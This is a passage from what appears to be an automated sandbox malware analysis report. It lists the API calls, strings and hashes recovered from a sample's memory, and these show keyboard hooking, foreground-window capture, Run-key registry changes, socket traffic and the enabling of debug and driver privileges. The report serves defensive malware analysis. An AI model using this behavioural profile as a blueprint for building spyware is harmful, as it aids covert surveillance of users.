                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: File$CloseCreateHandlePointerWrite
                                              • String ID:
                                              • API String ID: 3604237281-0
                                              • Opcode ID: d2ba0dc3731a38dae91c2beef8366eb7a335b2f9f41ba2c363fd86a30408d031
                                              • Instruction ID: 151deff2878064e2e5f4c3019f043201d4d2a7a25dfefc6fc224e88c9f49a64d
                                              • Opcode Fuzzy Hash: d2ba0dc3731a38dae91c2beef8366eb7a335b2f9f41ba2c363fd86a30408d031
                                              • Instruction Fuzzy Hash: 2E01F571208715BFE6244E28AD89FBBB7ECEB46364F11472AF561C23C0D761DD058631
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,000C9E6F), ref: 000C9DCD
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,000C9E6F), ref: 000C9DDC
                                              • Sleep.KERNEL32(00002710,?,?,?,000C9E6F), ref: 000C9E09
                                              • CloseHandle.KERNEL32(00000000,?,?,?,000C9E6F), ref: 000C9E10
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: File$CloseCreateHandleSizeSleep
                                              • String ID:
                                              • API String ID: 1958988193-0
                                              • Opcode ID: 8723c1c6c97cfb076b0b651e738c7602d06531423bd1b7fe0e91e96f20afb659
                                              • Instruction ID: 4c4bbb8bbfc90db1b10a8cb9913a172b6c976d5cba6162d906bf5fdfcf428acc
                                              • Opcode Fuzzy Hash: 8723c1c6c97cfb076b0b651e738c7602d06531423bd1b7fe0e91e96f20afb659
                                              • Instruction Fuzzy Hash: FC112930344A406FE731E7649D8DFAE7BEAAB62311F04040CF18243A92DAA07CD58365
                                              APIs
                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,000CBFB2,00000000,001342E0,001342F8,?,pth_unenc), ref: 000D2988
                                              • RegDeleteValueW.KERNEL32(?,?,?,pth_unenc), ref: 000D2998
                                              Strings
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 000D2986
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: DeleteOpenValue
                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                              • API String ID: 2654517830-1051519024
                                              • Opcode ID: 3add33ec050d1518aca83dbbc0f5dbf142d777907be5f850d422b6be4548c600
                                              • Instruction ID: 95025eef67f664e7d8c018ddaba477b03baccc88db147f893ec87320051ce6bd
                                              • Opcode Fuzzy Hash: 3add33ec050d1518aca83dbbc0f5dbf142d777907be5f850d422b6be4548c600
                                              • Instruction Fuzzy Hash: 2CE01274200304BBEF144F61DD06FDAB7BCBB55B88F004155F505E5190E271DE44A660
                                              APIs
                                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 000CAF84
                                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 000CAFAF
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: DeleteDirectoryFileRemove
                                              • String ID: pth_unenc
                                              • API String ID: 3325800564-4028850238
                                              • Opcode ID: 6e0819342c79d76f31d1636ea39c3d40121d2699a61f077f9900abf2596afdba
                                              • Instruction ID: 8e0f1812c017a8d6cc1dcffdbd69b4af49a1caf743567c83a69db85483f8a86f
                                              • Opcode Fuzzy Hash: 6e0819342c79d76f31d1636ea39c3d40121d2699a61f077f9900abf2596afdba
                                              • Instruction Fuzzy Hash: DFE04F715406108BC614AB71ED44BEFB7A8AB16315F00441EF8D2D3652DF749989D650
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 000D2537
                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 000D2554
                                              • RegCloseKey.KERNEL32(?), ref: 000D255F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 48a471b0c424dac608a3d4d81d3839b2b14eb7d647f9c05cf9965adbc26c2180
                                              • Instruction ID: 4e1eef86c30664ba3b9cfe9d8f4bb79bb960f612c707402b630e05b67c20aa9e
                                              • Opcode Fuzzy Hash: 48a471b0c424dac608a3d4d81d3839b2b14eb7d647f9c05cf9965adbc26c2180
                                              • Instruction Fuzzy Hash: 85F08176900228BBCB209BA1ED48DEF7FBDEB45750F004065BA06E3240D7709E45DBB0
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,001342F8), ref: 000D2679
                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 000D2692
                                              • RegCloseKey.KERNEL32(00000000), ref: 000D269D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 8dbf6008dc8cf489e4064e5ee091b3744601bbd9cbc38a6e2af194e91b752ff9
                                              • Instruction ID: e980e3915e10c24b4eec858ce392f210e7397d7bc4b72a43c653c3fbe70892bf
                                              • Opcode Fuzzy Hash: 8dbf6008dc8cf489e4064e5ee091b3744601bbd9cbc38a6e2af194e91b752ff9
                                              • Instruction Fuzzy Hash: 9C018135404229FBCF21AFA1DC05DDF7F78EF15350F008055BA0462260D7319AA5EBA0
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 000D24D7
                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,001342F8), ref: 000D24F5
                                              • RegCloseKey.KERNEL32(?), ref: 000D2500
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 648404005d813fc182630d64b3b98aa6b283847afcf59e1a2c5ba15395205509
                                              • Instruction ID: 54ec49fa973c0799dc248204dd676d2a321eb27739b90db2caa9d5db9fa0064f
                                              • Opcode Fuzzy Hash: 648404005d813fc182630d64b3b98aa6b283847afcf59e1a2c5ba15395205509
                                              • Instruction Fuzzy Hash: 61F03A76D00308BFDF119FA0AD05FDE7BB8EB08744F1080A1FA05E6294D6709B54ABA0
                                              APIs
                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,000CB996,001260E0), ref: 000D2485
                                              • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,000CB996,001260E0), ref: 000D2499
                                              • RegCloseKey.KERNEL32(?,?,?,000CB996,001260E0), ref: 000D24A4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 27d80018fe5496778ea6f41b5f9fc9c7b2a15806f56a5c4afc7562ad47d8c5cb
                                              • Instruction ID: e3fff96f3ab752c294a32682cee9fb903fda3b63fa4c4670a348fbbe52ca4b06
                                              • Opcode Fuzzy Hash: 27d80018fe5496778ea6f41b5f9fc9c7b2a15806f56a5c4afc7562ad47d8c5cb
                                              • Instruction Fuzzy Hash: 86E03931805224BA9B314BA29D09EDB7FBCEF2A7A0B108041BC09A2351D2218E80E6F0
                                              APIs
                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,00125554), ref: 000D27E3
                                              • RegSetValueExA.KERNEL32(00125554,000000AF,00000000,00000004,00000001,00000004,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D27FE
                                              • RegCloseKey.ADVAPI32(00125554,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D2809
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: CloseCreateValue
                                              • String ID:
                                              • API String ID: 1818849710-0
                                              • Opcode ID: bb2dea9eddf392fd87e2bfe4f0942041e5fbc3b7f78acca0bb9f3115345d1729
                                              • Instruction ID: 73487da1e99e8544afccb17bdf40902ede2a9398fc1c010b34834d38e88d11ee
                                              • Opcode Fuzzy Hash: bb2dea9eddf392fd87e2bfe4f0942041e5fbc3b7f78acca0bb9f3115345d1729
                                              • Instruction Fuzzy Hash: F6E06D71640308BBEF119FA09D06FDE3BB8EB19B94F108051FB05E62D0D6718E54EBA0
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,000C460E,00000000,?,?), ref: 000C456A
                                              • SetEvent.KERNEL32(?,?,?,000C460E,00000000,?,?), ref: 000C4588
                                              • recv.WS2_32(?,?,?,00000000), ref: 000C459F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: EventObjectSingleWaitrecv
                                              • String ID:
                                              • API String ID: 311754179-0
                                              • Opcode ID: fcc40964b8888e0a0a0b8f57444bfb3bc98ad1526d9a84dc833a9a965538b2d1
                                              • Instruction ID: 9c2a4d4ca44a9c17bbd9130238169ef5be28992da95ee1ae6b1e2c4ac2878bce
                                              • Opcode Fuzzy Hash: fcc40964b8888e0a0a0b8f57444bfb3bc98ad1526d9a84dc833a9a965538b2d1
                                              • Instruction Fuzzy Hash: 96F08236108612BFD7054B14ED08E4AFBA2FB88720F10C61AF510526A0CB71AC61DB51
                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 000DA959
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: GlobalMemoryStatus
                                              • String ID: @
                                              • API String ID: 1890195054-2766056989
                                              • Opcode ID: a898107862468718857077da2e194838c699c9c502fc5390ec59d5f37e219b9a
                                              • Instruction ID: 5ff19127388966fda8543717f01b0e5648e6ae65a4874f51a6eab627f4a560ba
                                              • Opcode Fuzzy Hash: a898107862468718857077da2e194838c699c9c502fc5390ec59d5f37e219b9a
                                              • Instruction Fuzzy Hash: 69D067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E9458B94
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: CountEventTick
                                              • String ID:
                                              • API String ID: 180926312-0
                                              • Opcode ID: c841f2399048fab8e2736912c30da4a65e2a59900bf57d32fe13b7fb51fa3289
                                              • Instruction ID: bb4360bc3d95e3993a9a3af6433594c5e020d5785405bc67f4ac965335e4a5be
                                              • Opcode Fuzzy Hash: c841f2399048fab8e2736912c30da4a65e2a59900bf57d32fe13b7fb51fa3289
                                              • Instruction Fuzzy Hash: FB5152326083505BC324F774D8A2FEF73A5AF92710F50492EF94A97293EF309945C666
                                              APIs
                                              • socket.WS2_32(?,00000001,00000006), ref: 000C4212
                                                • Part of subcall function 000C4262: WSAStartup.WS2_32(00000202,00000000), ref: 000C4277
                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 000C4252
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: CreateEventStartupsocket
                                              • String ID:
                                              • API String ID: 1953588214-0
                                              • Opcode ID: a0b0742b25db175dde6e4019ddeb607845aea120d62b2a44af2cabe6b2849989
                                              • Instruction ID: 9198e14bf370f1a2d1f4195e519bab30c8ad233473dd3e37bb9c94f726e778e2
                                              • Opcode Fuzzy Hash: a0b0742b25db175dde6e4019ddeb607845aea120d62b2a44af2cabe6b2849989
                                              • Instruction Fuzzy Hash: 68012C71418B909ED7358F38B845BDABFE0AB19314F044A5EF1D687BA1D3B1A485CB10
                                              APIs
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 000F3DE7
                                                • Part of subcall function 000F7BD7: RaiseException.KERNEL32(?,?,000F4411,?,?,?,?,?,?,?,?,000F4411,?,0012D644,000C4AD0), ref: 000F7C37
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 000F3E04
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: Exception@8Throw$ExceptionRaise
                                              • String ID:
                                              • API String ID: 3476068407-0
                                              • Opcode ID: 9998742e979d8b88f88c0c93b6451690660d067c3541bb8706e52fbccc25153c
                                              • Instruction ID: b72d4a49fe63f1c845dd118be9c2e6384e5fbe9c9a70ca4727aaaaa28e4d12f6
                                              • Opcode Fuzzy Hash: 9998742e979d8b88f88c0c93b6451690660d067c3541bb8706e52fbccc25153c
                                              • Instruction Fuzzy Hash: 45F0BE3480420D76CB14B6A4F80A9FD376C4F00320B608234FB2896CE2EFB0EB5AA595
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 000DAC74
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 000DAC87
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: Window$ForegroundText
                                              • String ID:
                                              • API String ID: 29597999-0
                                              • Opcode ID: 11d387af1941c30164277cb951a1a4a555abc00d20de8b740a0db4893a33d5ad
                                              • Instruction ID: 2319b42bb112c9a57a4952e0ec25d5392796c34a29a20692d853b41f787fceed
                                              • Opcode Fuzzy Hash: 11d387af1941c30164277cb951a1a4a555abc00d20de8b740a0db4893a33d5ad
                                              • Instruction Fuzzy Hash: DDE08075A1031867FB24A7649D4EFDB777CA704700F040099B619D21C3EDB09E44CBE4
                                              APIs
                                              • getaddrinfo.WS2_32(00000000,00000000,00000000,00131B28,00134358,00000000,000D4240,00000000,00000001), ref: 000D3FBC
                                              • WSASetLastError.WS2_32(00000000), ref: 000D3FC1
                                                • Part of subcall function 000D3E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 000D3E86
                                                • Part of subcall function 000D3E37: LoadLibraryA.KERNEL32(?), ref: 000D3EC8
                                                • Part of subcall function 000D3E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 000D3EE8
                                                • Part of subcall function 000D3E37: FreeLibrary.KERNEL32(00000000), ref: 000D3EEF
                                                • Part of subcall function 000D3E37: LoadLibraryA.KERNEL32(?), ref: 000D3F27
                                                • Part of subcall function 000D3E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 000D3F39
                                                • Part of subcall function 000D3E37: FreeLibrary.KERNEL32(00000000), ref: 000D3F40
                                                • Part of subcall function 000D3E37: GetProcAddress.KERNEL32(00000000,?), ref: 000D3F4F
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                              • String ID:
                                              • API String ID: 1170566393-0
                                              • Opcode ID: 45d8ce274a002368046cafba1323d57b980795dc39b5917f8bbdb14d48d70ae3
                                              • Instruction ID: a281dc48c8fafb0a35918d0a4bab0343470afb7096225bcf3350d4399533eff9
                                              • Opcode Fuzzy Hash: 45d8ce274a002368046cafba1323d57b980795dc39b5917f8bbdb14d48d70ae3
                                              • Instruction Fuzzy Hash: D7D05E326406316FE354676DAC00EFAFAEDDFA6B71B150027F400D3A94D6904D82C3B6
                                              APIs
                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,000CD9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0012556C,00000003,00000000), ref: 000CBEE6
                                              • GetLastError.KERNEL32 ref: 000CBEF1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              • API ID: CreateErrorLastMutex
                                              • String ID:
                                              • API String ID: 1925916568-0
                                              • Opcode ID: d72f064f27f35d10ec98e051c69c544c426cdf52a1488e791d3bdd38d362414b
                                              • Instruction ID: c56c8e856ee810c1a6829b731f23a55691664a6ecad6794fd0439ba74f3ee99a
                                              • Opcode Fuzzy Hash: d72f064f27f35d10ec98e051c69c544c426cdf52a1488e791d3bdd38d362414b
                                              • Instruction Fuzzy Hash: 29D012706082009BE70C1774AD4EBBD3566E784702F004169B507D6AD1CB7448809511
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID:
                                              • API String ID: 176396367-0
                                              • Opcode ID: fa5574a3a8dce29d88be0a2111690bedae46a3abdb664f0c1eff659bef5053b7
                                              • Instruction ID: a464d039db74e2773a6e26e047f59d2a513beb855f553a473482cc4dd6bb70bd
                                              • Opcode Fuzzy Hash: fa5574a3a8dce29d88be0a2111690bedae46a3abdb664f0c1eff659bef5053b7
                                              • Instruction Fuzzy Hash: 48116A31900645AFDB15EF64D852EEF7BB4AF25310B10442DF85293293EF74B959CB50
                                              APIs
                                              • CallNextHookEx.USER32(001340F8,?,?,?), ref: 000C9B02
                                                • Part of subcall function 000CAD56: GetKeyState.USER32(00000011), ref: 000CAD5B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CallHookNextState
                                              • String ID:
                                              • API String ID: 3280314413-0
                                              • Opcode ID: 86cb908a87392341c77a1a6602f3adb8a7b03cdefe7fd97f9fbe4ae461f81dce
                                              • Instruction ID: fb967cb3fde32e9876122375b4429e2d9e5f4d68eb3f0082a0683791982818b9
                                              • Opcode Fuzzy Hash: 86cb908a87392341c77a1a6602f3adb8a7b03cdefe7fd97f9fbe4ae461f81dce
                                              • Instruction Fuzzy Hash: 76F0F9723042895BCA14AFFC9CD8FAE77A5EB86319F00442DB40346953CAA58804D393
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,000F4403,?,?,000F7227,?,?,?,?,?,000CCC87,000F4403,?,?,?,?), ref: 00106B31
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 12de76ff6dc6c327dd46f669e88c411953607cbdf5b735c00c6ff022e5790696
                                              • Instruction ID: 496dea62c29c3646f942beece522b7b60401eff5b47dae264ce7fe25ba3c3f99
                                              • Opcode Fuzzy Hash: 12de76ff6dc6c327dd46f669e88c411953607cbdf5b735c00c6ff022e5790696
                                              • Instruction Fuzzy Hash: 5AE022B130023A67EB202B69CC01F9B3A899F523A0F154120FCC9DA4D0CFE0CC6081E0
                                              APIs
                                              • WSAStartup.WS2_32(00000202,00000000), ref: 000C4277
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Startup
                                              • String ID:
                                              • API String ID: 724789610-0
                                              • Opcode ID: 0e611b1d4976edb942d41382d5b49ac8da47f591ef4286791289a5ce4c913500
                                              • Instruction ID: 5dff2fb448ec8eb99c8df0af4c98d57e93a691fe6700e0b0d37d4382a7ae4919
                                              • Opcode Fuzzy Hash: 0e611b1d4976edb942d41382d5b49ac8da47f591ef4286791289a5ce4c913500
                                              • Instruction Fuzzy Hash: 0FD012329596489ED610AAB4AD0F8E47B6CD317612F0003AA6CB583ED2E640261CC2A7
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00409103
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040910A
                                              Strings
                                              • SeProfileSingleProcessPrivilege, xrefs: 00409204
                                              • Could not enable SeSystemEnvironmentPrivilege, xrefs: 0040928C
                                              • Could not enable SeDebugPrivilege, xrefs: 0040915E
                                              • SeLoadDriverPrivilege, xrefs: 00409179
                                              • Could not enable SeLoadDriverPrivilege, xrefs: 004091B2
                                              • SeDebugPrivilege, xrefs: 0040911F
                                              • Could not enable SeProfileSingleProcessPrivilege, xrefs: 00409241
                                              • SeSystemEnvironmentPrivilege, xrefs: 0040924F
                                              • SeSecurityPrivilege, xrefs: 004091BD
                                              • Could not enable SeSecurityPrivilege, xrefs: 004091F6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Process$CurrentOpenToken
                                              • String ID: Could not enable SeDebugPrivilege$Could not enable SeLoadDriverPrivilege$Could not enable SeProfileSingleProcessPrivilege$Could not enable SeSecurityPrivilege$Could not enable SeSystemEnvironmentPrivilege$SeDebugPrivilege$SeLoadDriverPrivilege$SeProfileSingleProcessPrivilege$SeSecurityPrivilege$SeSystemEnvironmentPrivilege
                                              • API String ID: 2256020841-272810714
                                              • Opcode ID: aa4f05c840bd627e2d73487595dc64d3eda90993e1edbf8c139383d39da773a4
                                              • Instruction ID: b8165345c32a87174b9950b5c2d351cd3d9e982d028e98a03367593e3ed6d555
                                              • Opcode Fuzzy Hash: aa4f05c840bd627e2d73487595dc64d3eda90993e1edbf8c139383d39da773a4
                                              • Instruction Fuzzy Hash: 89516F70A4024ABEEB10DFA18D84EBF7BACEB04744F14443AB901F9192D778CE419A79
                                              APIs
                                              • _strlen.LIBCMT ref: 00408885
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,?,00000104), ref: 00408892
                                              • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 004088CD
                                              • CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 004088F8
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00408910
                                              • CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 00408937
                                                • Part of subcall function 004084F3: lstrcmpA.KERNEL32(1.3.6.1.4.1.311.2.1.12,?,004E9598,0000001C), ref: 0040852B
                                                • Part of subcall function 004084F3: CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,00000000,?), ref: 00408553
                                                • Part of subcall function 004084F3: LocalAlloc.KERNEL32(00000040,?), ref: 00408569
                                                • Part of subcall function 004084F3: CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,?,?), ref: 00408595
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040897F
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 004089CF
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00408A1F
                                              • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,000B0000,?,00000000), ref: 00408A90
                                              • _strlen.LIBCMT ref: 00408BEC
                                              • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,000B0000,?,00000000), ref: 00408C64
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00408E14
                                              • CertVerifyTimeValidity.CRYPT32(?,?), ref: 00408E2C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Crypt$ByteCharMultiWide$CertObjectTime$AllocCertificateDecodeFindLocalParamStore_strlen$FileQuerySystemValidityVerifylstrcmp
                                              • String ID: Certificate is valid from: %02d/%02d/%04d %02d:%02d until %02d/%02d/%04d %02d:%02d $Certificate was signed on: %02d/%02d/%04d %02d:%02d$Issuer: %s$Serial: %s$Subject: %s$Signer Certificate:$Even Balance, Inc.$MoreInfo Link : %s$Program Name : %s$Publisher Link : %s$Time Stamp Certificate
                                              • API String ID: 318054356-2987722516
                                              • Opcode ID: b6ab1c5a61adf519dfdb67f66f61e91087094ad8cf8c24daf6457fb125bf4222
                                              • Instruction ID: 7d8227bbab4e461be6b82a648dd884efa89abed3f85ceb009fba5573162d0a8f
